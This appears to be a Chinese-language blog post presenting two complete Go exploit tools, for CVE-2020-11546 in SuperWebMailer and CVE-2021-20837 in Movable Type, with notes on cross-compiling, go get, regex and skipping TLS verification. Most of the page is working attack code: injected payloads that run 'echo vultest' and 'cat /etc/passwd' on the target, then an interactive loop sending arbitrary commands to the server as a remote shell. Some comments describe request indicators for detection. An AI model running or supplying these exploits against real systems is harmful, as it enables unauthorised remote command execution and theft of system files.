CVE-2020-11546

[!NOTE]

已上传至GitHub:https://github.com/damit5/CVE-2020-11546

扩展1:交叉编译

  1. CGO_ENABLED=0 GOOS=darwin GOARCH=amd64 go build -ldflags="-s -w" -trimpath -o release/superwebmailerRCE_darwin
  2. CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -ldflags="-s -w" -trimpath -o release/superwebmailerRCE_linux
  3. CGO_ENABLED=0 GOOS=windows GOARCH=amd64 go build -ldflags="-s -w" -trimpath -o release/superwebmailerRCE_win.exe

扩展2:go.mod

  1. go mod init <仓库地址>
  2. go mod init github.com/damit5/CVE-2020-11546

不然无法通过 go get -u 自动下载并编译,会出现问题

扩展3:go get

直接使用go get -u github.com/xxx可能出现版本的问题,可以使用如下命令指定版本或者分支

  1. go get -u -v github.com/damit5/CVE-2020-11546@master

[!TIP]

也可以使用@commit hash等等

扩展4:交互输入

  // Prompt loop: keep asking until a non-empty line is read from stdin.
  // NOTE(review): the Scanln error is discarded, so on EOF or a read
  // error `command` keeps its current value; while it is still empty this
  // loop re-prints the prompt without end.
  for {
      fmt.Printf("\n\ncommand: ")
      _, _ = fmt.Scanln(&command)
      if command != "" {
          break
      }
  }

代码

  1. package main
  2. import (
  3. "bytes"
  4. "fmt"
  5. "io/ioutil"
  6. "net/http"
  7. "os"
  8. "strings"
  9. )
  // banner prints the tool's ASCII-art header followed by the CVE id to stdout.
  func banner() {
      // Kept as a raw string so the backslashes in the art need no escaping.
      const art = `
.___ _____ ____ __
__| _// | | _____/_ |/ |_ ______
/ __ |/ | |_/ \| \ __\/ ___/
/ /_/ / ^ / Y Y \ || | \___ \
\____ \____ ||__|_| /___||__| /____ >
\/ |__| \/ \/
CVE-2020-11546
`
      // Two string operands: fmt.Print adds no separator, so this is the
      // same output as Println(art).
      fmt.Print(art, "\n")
  }
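  /*
   * argsCheck validates the command line: exactly one positional argument
   * (the target) is required.
   *
   * args is the full os.Args slice, program name included. When the count
   * is wrong the usage text is printed and the process exits with status 2
   * (the conventional "bad usage" code, so shell wrappers do not mistake a
   * misuse for success). When it returns, args[1] is guaranteed to exist.
   */
  func argsCheck(args []string) {
      if len(args) == 2 {
          return
      }
      // args can be empty when the binary is exec'd with no argv at all;
      // never index into it blindly.
      prog := "<program>"
      if len(args) > 0 {
          prog = args[0]
      }
      fmt.Printf("Usage:\n\t./%s <target>\n", prog)
      os.Exit(2)
  }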
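  /*
   * urlHandler normalises a user-supplied target into a base URL.
   *
   * "http://" is prepended when the input carries neither "http://" nor
   * "https://", and every trailing "/" is removed so that a path can later
   * be appended with a single separator. The normalised string is returned;
   * no further validation of the host is performed.
   */
  func urlHandler(target string) string {
      // Test for a full scheme rather than the bare word "http": a host name
      // that merely starts with those letters has no scheme and still needs one.
      hasScheme := strings.HasPrefix(target, "http://") || strings.HasPrefix(target, "https://")
      if !hasScheme {
          target = "http://" + target
      }
      // TrimRight drops all trailing slashes, not just one, and the debug
      // Println of the trimmed value is gone: a helper should not write to stdout.
      return strings.TrimRight(target, "/")
  }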
  /*
   * check sends one probe request to target and reports whether the
   * response shows that the injected marker was executed.
   *
   * What appears on the wire (the part worth a detection rule or a log
   * search): a POST to <target>/mailingupgrade.php, form-encoded, with a
   * Language field that is the URL-encoded form of
   * de{${system("echo vultest")}} plus fixed RegName/RegNumber/NextBtn
   * fields, under a Firefox-like User-Agent. A response body containing
   * the literal "vultest" is taken as confirmation.
   *
   * NOTE(review): every error is discarded. If client.Do fails (refused
   * connection, DNS error) resp is nil and the read of resp.Body panics;
   * resp.Body is never closed; the http.Client has no timeout, so a target
   * that accepts and never answers blocks this call indefinitely.
   */
  func check(target string) bool {
      // Build the probe request.
      vulurl := target + "/mailingupgrade.php"
      req, _ := http.NewRequest("POST", vulurl, bytes.NewReader([]byte(`step=4&Language=de%7b$%7bsystem(%22echo vultest%22)%7d%7d&RegName=12345678901234567890123&RegNumber=12345&NextBtn=Weiter+%3E`)))
      req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0")
      req.Header.Set("Content-type", "application/x-www-form-urlencoded")
      // Send it (see the NOTE above: nil resp on failure, body never closed).
      client := http.Client{}
      resp, _ := client.Do(req)
      body, _ := ioutil.ReadAll(resp.Body)
      // The marker echoed back by the server is the success signal.
      if strings.Contains(string(body), "vultest") {
          return true
      }
      return false
  }
  /*
   * exp sends one command through the same injection point that check()
   * probed and prints what the server returned. (The original header
   * repeated check()'s "vulnerability check" label; this is the exploitation
   * step, not the probe.)
   *
   * target is the normalised base URL; command is spliced verbatim into the
   * Language field of the form body. The response has the server's fixed
   * "Can't load correct language file in /language directory" message
   * removed and is whitespace-trimmed before being printed to stdout.
   * Nothing is returned.
   *
   * NOTE(review): as in check(), the client.Do error is discarded (a nil
   * resp panics on the next line), resp.Body is never closed and the client
   * has no timeout.
   */
  func exp(target string, command string) {
      // Build the request.
      vulurl := target + "/mailingupgrade.php"
      data := `step=4&Language=de%7b$%7bsystem(%22` + command + `%22)%7d%7d&RegName=12345678901234567890123&RegNumber=12345&NextBtn=Weiter+%3E`
      req, _ := http.NewRequest("POST", vulurl, bytes.NewReader([]byte(data)))
      req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0")
      req.Header.Set("Content-type", "application/x-www-form-urlencoded")
      // Send it.
      client := http.Client{}
      resp, _ := client.Do(req)
      body, _ := ioutil.ReadAll(resp.Body)
      // Strip the boilerplate error the page always emits, then print the rest.
      res := strings.Replace(string(body), "Can't load correct language file in /language directory", "", -1)
      res = strings.TrimSpace(res)
      fmt.Println(res)
  }
  // main prints the banner, validates the arguments, normalises the target
  // URL and runs a single probe via check(). On a positive result it enters
  // an interactive loop that reads one line from stdin at a time and hands
  // it to exp(); otherwise it reports the negative result and returns.
  func main() {
      args := os.Args
      banner()
      argsCheck(args)
      target := args[1]
      target = urlHandler(target)
      if check(target) {
          fmt.Printf("target %s is vuln", target)
          var command string
          // The outer loop has no exit condition: there is no quit command,
          // so the process ends only when it is interrupted.
          for {
              // Re-prompt until a non-empty line arrives.
              // NOTE(review): the Scanln error is ignored. On EOF command
              // appears to keep its previous value, so the last line would be
              // resent forever; while it is still empty the prompt just spins.
              for {
                  fmt.Printf("\n\ncommand: ")
                  fmt.Scanln(&command)
                  if command != "" {
                      break
                  }
              }
              exp(target, command)
          }
      } else {
          fmt.Printf("target %s is not vuln", target)
      }
  }

image-20211229173338536

测试图

image-20211229152446871

CVE-2021-20837

扩展5:忽略SSL证书

[!WARNING]

这个错误不容易发现,所以需要经验来判断,在初始化客户端的时候需要忽略SSL证书

  // Build a client that skips TLS certificate verification.
  // InsecureSkipVerify: true means the server certificate is not checked at
  // all (neither the chain nor the host name), so the connection accepts any
  // certificate, including one presented by an interceptor. Keep this
  // confined to lab targets; anywhere else, trust the real CA instead.
  var Client http.Client
  tr := &http.Transport{
      TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, // skip certificate verification
  }
  Client = http.Client{
      Transport: tr,
  }

扩展6:正则表达式

默认情况下,`.` 是不能匹配换行符 `\n` 的;有时候我们需要让 `.` 也能匹配到 `\n`,这时就需要稍微修改一下写法.

[!TIP]

在线正则表达式测试网站:https://regex101.com/

  1. (?s).*

实例:
image-20211229171038928

代码

  1. package main
  2. import (
  3. "bytes"
  4. "crypto/tls"
  5. "encoding/base64"
  6. "fmt"
  7. "io/ioutil"
  8. "net/http"
  9. "os"
  10. "regexp"
  11. "strings"
  12. )
  // Client is the process-wide HTTP client. It holds the zero value until
  // check() replaces it with a client whose Transport disables TLS
  // certificate verification (InsecureSkipVerify); exp() then reuses that
  // same client, so the relaxed setting applies to every later request.
  var Client http.Client
  // banner prints the tool's ASCII-art header followed by the CVE id to stdout.
  func banner() {
      // Kept as a raw string so the backslashes in the art need no escaping.
      const art = `
.___ _____ ____ __
__| _// | | _____/_ |/ |_ ______
/ __ |/ | |_/ \| \ __\/ ___/
/ /_/ / ^ / Y Y \ || | \___ \
\____ \____ ||__|_| /___||__| /____ >
\/ |__| \/ \/
CVE-2021-20837
`
      // Two string operands: fmt.Print adds no separator, so this is the
      // same output as Println(art).
      fmt.Print(art, "\n")
  }
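  /*
   * argsCheck validates the command line: exactly one positional argument
   * (the target) is required.
   *
   * args is the full os.Args slice, program name included. When the count
   * is wrong the usage text is printed and the process exits with status 2
   * (the conventional "bad usage" code, so shell wrappers do not mistake a
   * misuse for success). When it returns, args[1] is guaranteed to exist.
   */
  func argsCheck(args []string) {
      if len(args) == 2 {
          return
      }
      // args can be empty when the binary is exec'd with no argv at all;
      // never index into it blindly.
      prog := "<program>"
      if len(args) > 0 {
          prog = args[0]
      }
      fmt.Printf("Usage:\n\t./%s <target>\n", prog)
      os.Exit(2)
  }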
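  /*
   * urlHandler normalises a user-supplied target into a base URL.
   *
   * "http://" is prepended when the input carries neither "http://" nor
   * "https://", and every trailing "/" is removed so that a path can later
   * be appended with a single separator. The normalised string is returned;
   * no further validation of the host is performed.
   */
  func urlHandler(target string) string {
      // Test for a full scheme rather than the bare word "http": a host name
      // that merely starts with those letters has no scheme and still needs one.
      hasScheme := strings.HasPrefix(target, "http://") || strings.HasPrefix(target, "https://")
      if !hasScheme {
          target = "http://" + target
      }
      // TrimRight drops all trailing slashes, not just one, and the debug
      // Println of the trimmed value is gone: a helper should not write to stdout.
      return strings.TrimRight(target, "/")
  }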
  /*
   * check sends one probe request to target and reports whether the
   * response shows that the probe command ran.
   *
   * What appears on the wire (the part worth a detection rule or a log
   * search): a POST to <target>/cgi-bin/mt/mt-xmlrpc.cgi with Content-type
   * text/xml carrying an XML-RPC methodCall whose methodName is
   * mt.handler_to_coderef and whose single parameter is a base64 value.
   * That method name inside XML-RPC traffic is the indicator. The base64
   * decodes to the backtick-quoted string "`cat /etc/passwd`", and a
   * response containing "root:x:0" is taken as confirmation.
   *
   * Side effect: this function also initialises the package-level Client
   * with a Transport that sets InsecureSkipVerify, i.e. certificate
   * verification is disabled and any certificate is accepted; exp() reuses
   * that client afterwards.
   *
   * NOTE(review): every error is discarded. If Client.Do fails resp is nil
   * and the read of resp.Body panics; resp.Body is never closed; the client
   * has no timeout.
   */
  func check(target string) bool {
      // Build the probe request.
      vulurl := target + "/cgi-bin/mt/mt-xmlrpc.cgi"
      command := "`cat /etc/passwd`"
      base64_cmd := base64.StdEncoding.EncodeToString([]byte(command))
      payload := fmt.Sprintf(`<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>mt.handler_to_coderef</methodName>
<params>
<param>
<value>
<base64>
%s
</base64>
</value>
</param>
</params>
</methodCall>`, base64_cmd)
      req, _ := http.NewRequest("POST", vulurl, bytes.NewReader([]byte(payload)))
      req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0")
      req.Header.Set("Content-type", "text/xml; charset=UTF-8")
      // Send it. The Transport below disables TLS certificate verification
      // (chain and host name alike) and is stored in the global Client.
      tr := &http.Transport{
          TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, // skip certificate verification
      }
      Client = http.Client{
          Transport: tr,
      }
      resp, _ := Client.Do(req)
      body, _ := ioutil.ReadAll(resp.Body)
      // The first passwd line echoed back is the success signal.
      if strings.Contains(string(body), "root:x:0") {
          return true
      }
      return false
  }
  /*
   * exp sends one command through the same XML-RPC entry point that check()
   * probed and prints the part of the response that carries its output.
   * (The original header repeated check()'s "vulnerability check" label;
   * this is the exploitation step, not the probe.)
   *
   * target is the normalised base URL; command is wrapped in backticks,
   * base64-encoded and placed in the methodCall parameter. The response is
   * searched for the server's "Can't locate ... in @INC" error text and the
   * middle part is printed to stdout. Nothing is returned. Relies on the
   * package-level Client, which check() must have initialised first.
   *
   * NOTE(review): the regexp.Compile error is discarded (the pattern is a
   * constant, so a package-level regexp.MustCompile would fit better), and
   * FindAllStringSubmatch(...)[0][1] panics with an index out of range
   * whenever the response does not match - a patched target, an error page
   * or an empty body. As in check(), the Client.Do error is dropped and
   * resp.Body is never closed.
   */
  func exp(target string, command string) {
      // Build the request.
      vulurl := target + "/cgi-bin/mt/mt-xmlrpc.cgi"
      base64_cmd := base64.StdEncoding.EncodeToString([]byte("`" + command + "`"))
      payload := fmt.Sprintf(`<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>mt.handler_to_coderef</methodName>
<params>
<param>
<value>
<base64>
%s
</base64>
</value>
</param>
</params>
</methodCall>`, base64_cmd)
      req, _ := http.NewRequest("POST", vulurl, bytes.NewReader([]byte(payload)))
      req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0")
      req.Header.Set("Content-type", "text/xml; charset=UTF-8")
      // Send it through the shared client.
      resp, _ := Client.Do(req)
      body, _ := ioutil.ReadAll(resp.Body)
      // Extract the text between the fixed error prefix and suffix; the (?s)
      // flag lets "." span line breaks so multi-line output is captured.
      regex, _ := regexp.Compile("Can't\\slocate\\s((?s).*)\\sin @INC")
      res := regex.FindAllStringSubmatch(string(body), 1)[0][1]
      fmt.Println(res)
  }
  // main prints the banner, validates the arguments, normalises the target
  // URL and runs a single probe via check(). On a positive result it enters
  // an interactive loop that reads one line from stdin at a time and hands
  // it to exp(); otherwise it reports the negative result and returns.
  func main() {
      args := os.Args
      banner()
      argsCheck(args)
      target := args[1]
      target = urlHandler(target)
      if check(target) {
          fmt.Printf("target %s is vuln", target)
          var command string
          // The outer loop has no exit condition: there is no quit command,
          // so the process ends only when it is interrupted.
          for {
              // Re-prompt until a non-empty line arrives.
              // NOTE(review): the Scanln error is explicitly discarded. On EOF
              // command appears to keep its previous value, so the last line
              // would be resent forever; while it is still empty the prompt
              // just spins.
              for {
                  fmt.Printf("\n\ncommand: ")
                  _, _ = fmt.Scanln(&command)
                  if command != "" {
                      break
                  }
              }
              exp(target, command)
          }
      } else {
          fmt.Printf("target %s is not vuln", target)
      }
  }

测试图

image-20211229174210916